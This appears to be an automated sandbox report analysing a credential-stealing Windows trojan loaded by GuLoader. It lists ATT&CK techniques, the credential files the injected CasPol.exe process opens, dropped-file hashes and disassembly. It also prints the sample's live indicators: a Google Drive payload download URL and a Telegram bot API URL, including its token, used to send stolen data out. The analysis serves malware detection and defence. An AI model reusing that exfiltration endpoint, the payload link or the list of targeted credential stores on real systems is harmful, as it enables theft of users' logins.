            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1668, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1668, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1668, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
            Virtualization/Sandbox Evasion
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits114
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 625379 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 12/05/2022 Architecture: WINDOWS Score: 100 22 googlehosted.l.googleusercontent.com 2->22 24 drive.google.com 2->24 26 2 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected GuLoader 2->38 40 5 other signatures 2->40 8 SecuriteInfo.com.W32.AIDetect.malware2.8516.exe 20 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 42 Writes to foreign memory regions 8->42 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49753 TELEGRAMRU United Kingdom 12->28 30 googlehosted.l.googleusercontent.com 142.250.186.33, 443, 49751 GOOGLEUS United States 12->30 32 drive.google.com 216.58.212.142, 443, 49750 GOOGLEUS United States 12->32 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 2 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.W32.AIDetect.malware2.8516.exe13%VirustotalBrowse
            SecuriteInfo.com.W32.AIDetect.malware2.8516.exe7%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsz5764.tmp\System.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsz5764.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://Yp7sE2ZThKzSHqA.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://api.ipify.org%t-0%Avira URL Cloudsafe
            https://api.ipify.org%%startupfolder%0%Avira URL Cloudsafe
            http://yCCtaB.com0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.212.142
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                googlehosted.l.googleusercontent.com
                142.250.186.33
                truefalse
                  high
                  doc-04-bk-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://doc-04-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jc95onm7rbud0rh2kvsckdceb/1652368050000/02385140022842422686/*/1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB?e=downloadfalse
                      high
                      https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://Yp7sE2ZThKzSHqA.comCasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39283362097.000000001DB2F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://drive.google.com/5s(CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.telegram.orgCasPol.exe, 00000004.00000002.39283433304.000000001DB37000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.org/bot5362707045:AAGBjkYF97cvI4xaEhJ1OrouiqS3umCPqqA/sendDocumentdocument-----CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://doc-04-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jCasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34611069380.0000000001521000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.34610499874.0000000001521000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/CasPol.exe, 00000004.00000002.39258621414.000000000149B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/CasPol.exe, 00000004.00000002.39259342233.000000000151A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://doc-04-bk-docs.googleusercontent.com/RCasPol.exe, 00000004.00000002.39258953296.00000000014E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.ipify.org%t-CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://api.ipify.org%%startupfolder%CasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.W32.AIDetect.malware2.8516.exefalse
                                        high
                                        http://api.telegram.orgCasPol.exe, 00000004.00000002.39283527029.000000001DB4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000004.00000002.39283433304.000000001DB37000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://yCCtaB.comCasPol.exe, 00000004.00000002.39282146178.000000001DA11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://doc-04-bk-docs.googleusercontent.com/CasPol.exe, 00000004.00000003.34615691496.0000000001521000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://doc-04-bk-docs.googleusercontent.com/_CasPol.exe, 00000004.00000002.39258953296.00000000014E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                api.telegram.orgUnited Kingdom
                                                62041TELEGRAMRUfalse
                                                216.58.212.142
                                                drive.google.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.186.33
                                                googlehosted.l.googleusercontent.comUnited States
                                                15169GOOGLEUSfalse
                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:625379
                                                Start date and time: 12/05/202217:05:342022-05-12 17:05:34 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 25s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                Run name:Suspected Instruction Hammering
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@6/4@3/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 30.7% (good quality ratio 30.1%)
                                                • Quality average: 87.6%
                                                • Quality standard deviation: 21.7%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 51.105.236.244
                                                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                TimeTypeDescription
                                                17:08:11API Interceptor2693x Sleep call for process: CasPol.exe modified
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):164654
                                                Entropy (8bit):7.328477148984372
                                                Encrypted:false
                                                SSDEEP:3072:0OjNBC83H7WOOnQkvcWeC4tQMrbfGPmSIiWj1KYOcvH:0OjjCmH7bOnQkvczC4tjGOSIii1pOc/
                                                MD5:4F4AB714DFE3298940A65606E9D71F3D
                                                SHA1:ACAA9B62D1E2245695F551374C3B529AF49D378D
                                                SHA-256:B9E09B4CE4FD0A5A9AF776CD64CDAD0C1B06FDA01B479E93B9B202B9F2927F4B
                                                SHA-512:921B8C6651FABFA684E911A83439AC43D389F451B07430FF3F98CCD4E7616251C9835B1666039E506B7DABC0FE53EA388B7E0E42FE94D90E70690423838E987E
                                                Malicious:false
                                                Reputation:low
                                                Preview:4...5..`X..iSg.a$3;......A.ZM...'.*uM...u......=c}.+..3f...=a.ex&G.\}...K6..S....H.Dflv.~...5'a..+.3.',4..E..tk{#.]..-....#...}p. .k....[.&...H.GE.."....#Z..k$..`gG..@...&=sp...#../..C....R.-C.$.q...?.R.t.s.... B..1....7...Fm..q.#.|.i....WXV9.&.U]......w.`...nc.3.=r..[....x..EP.X.0_..J.(6....5h..|.>...$.NXZc..7.......d.,[..4........{]...(....V-... .......Z...(et..t.!....r9+..3!.\}..q..e..a~`T5.@..^TS..o.....HE....%....*ul=.si6.s.e.+...|C.a.k<v.'.<._@.O.........yZ...`...Q.. ...pd7....Pc...Fg...F<Z.....|.N.NW5..F.......Q!..%o.....I.T2.{.+T.'C..6.....u._nT......:...*.>..h..VFM...}...z"A........"...P..m.;V......_M..h)..yxjP.....sL(....x.x...2..|.....vu.c*[.....PHb....L...K.w2#[.oyu....jj....o...7.jU..G0U.,...W.1/Y.X...8\..aU6..k....|a2C)I..OYG.<.F......<.+.B.M...W.I.6'..Q....JSU.&z...e...H./\....)...C.....-.....,>.Z.....m.....Z......_2.l..k.['.`..T....N..sb.!.v..Y.m.D..3..Q.<.E..6k0.r.wR..f..(gr>....s..FkAC.{,....TdK..u.q..D...IlF....'....+..8..
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):876
                                                Entropy (8bit):2.973407432553269
                                                Encrypted:false
                                                SSDEEP:12:8gl0URsXUCV/tz+7RafgKDNwpZlEg/rNJkKAh4t2YCBTo8:84+raRMgKKXy45HALJT
                                                MD5:7D6897C6C92B6D01EE66251C99676F53
                                                SHA1:B6FB27DA4E0570E15E6F0649F3BB51BCE7513333
                                                SHA-256:B7C61310744BC6551E039639E78490EA1C0C39EDE8D501B7F558FF77AE531DB2
                                                SHA-512:974FAD1FF6D3150830EA036DC7FEDF514ECC5E9CC200D59311C7FD547F52FD2DACEB4D9CC22A9E9DF1DF8392A8E36499EF309193CE169643B705BB728650DDFC
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F........................................................3....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....l.2...........UNBLAZONED.exe..N............................................U.N.B.L.A.Z.O.N.E.D...e.x.e...........\.U.N.B.L.A.Z.O.N.E.D...e.x.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.814115788739565
                                                Encrypted:false
                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):30
                                                Entropy (8bit):3.964735178725505
                                                Encrypted:false
                                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                MD5:9F754B47B351EF0FC32527B541420595
                                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                Malicious:false
                                                Preview:NordVPN directory not found!..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.554007831073136
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:SecuriteInfo.com.W32.AIDetect.malware2.8516.exe
                                                File size:253128
                                                MD5:90e91d605fb261fa827093074c0d7178
                                                SHA1:1737b52ca846659954692ac55235addf749e405b
                                                SHA256:4700f996868b461bae3a5b57efcd8719169d0c9acb400fa77d6a36787b37b0e1
                                                SHA512:e637de93126346d108bd7d7dbda163d2dd492be4645d6bd7e9f7d6af63de094d4839581009ea55b3387aaec8b74311d86f17332246d42e7418eba4b243a3d6cd
                                                SSDEEP:6144:qbE/HUKlmkDdr0OjjCmH7FOnQkvWqYlKPwjH25:qboFJHuc7FivWqNPwj25
                                                TLSH:C234D01E3661C0EAF88883751B3A9B0B2A9FBC07138219573771B7785B352D3D91E9D8
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                Icon Hash:8803969c49c2c3c0
                                                Entrypoint:0x40352d
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                Signature Valid:false
                                                Signature Issuer:CN=&#34;gedske Bladring2 Germinates4 &#34;, O=overcull, L=Sucy-en-Brie, S=&#195;&#142;le-de-France, C=FR
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 12/05/2022 10:38:46 12/05/2023 10:38:46
                                                Subject Chain
                                                • CN=&#34;gedske Bladring2 Germinates4 &#34;, O=overcull, L=Sucy-en-Brie, S=&#195;&#142;le-de-France, C=FR
                                                Version:3
                                                Thumbprint MD5:D0ACA7F1FD1382B9C35DFC16B627DDFD
                                                Thumbprint SHA-1:BDE2B99E0FDE745B68290E3A60150DFA90A8EE08
                                                Thumbprint SHA-256:EFD99FBE0F355D7F5157F6E6BC35D3ABB4549B7B947F6131A6F6EAFE73957876
                                                Serial:4F99C01EF8C999C6
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 000003F4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [ebp-14h], ebx
                                                mov dword ptr [ebp-04h], 0040A2E0h
                                                mov dword ptr [ebp-10h], ebx
                                                call dword ptr [004080CCh]
                                                mov esi, dword ptr [004080D0h]
                                                lea eax, dword ptr [ebp-00000140h]
                                                push eax
                                                mov dword ptr [ebp-0000012Ch], ebx
                                                mov dword ptr [ebp-2Ch], ebx
                                                mov dword ptr [ebp-28h], ebx
                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F06EC98AE6Ah
                                                lea eax, dword ptr [ebp-00000140h]
                                                mov dword ptr [ebp-00000140h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [ebp-0000012Ch]
                                                mov ecx, dword ptr [ebp-00000112h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [ebp-26h], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [ebp-2Ch], ax
                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                jnc 00007F06EC98AE3Ah
                                                and word ptr [ebp-00000132h], 0000h
                                                mov eax, dword ptr [ebp-00000134h]
                                                movzx ecx, byte ptr [ebp-00000138h]
                                                mov dword ptr [00434FB8h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [ebp-0000013Ch]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [ebp-2Ch]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x139f8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x3d6500x678.ndata
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x360000x320000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x680000x139f80x13a00False0.570984275478data6.55035103954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x683580x8592PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                RT_ICON0x708f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964863EnglishUnited States
                                                RT_ICON0x74b180x25a8dataEnglishUnited States
                                                RT_ICON0x770c00x1a68dataEnglishUnited States
                                                RT_ICON0x78b280x10a8dataEnglishUnited States
                                                RT_ICON0x79bd00x988dataEnglishUnited States
                                                RT_ICON0x7a5580x6b8dataEnglishUnited States
                                                RT_ICON0x7ac100x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x7b0780x100dataEnglishUnited States
                                                RT_DIALOG0x7b1780x11cdataEnglishUnited States
                                                RT_DIALOG0x7b2980xc4dataEnglishUnited States
                                                RT_DIALOG0x7b3600x60dataEnglishUnited States
                                                RT_GROUP_ICON0x7b3c00x76dataEnglishUnited States
                                                RT_VERSION0x7b4380x280dataEnglishUnited States
                                                RT_MANIFEST0x7b6b80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
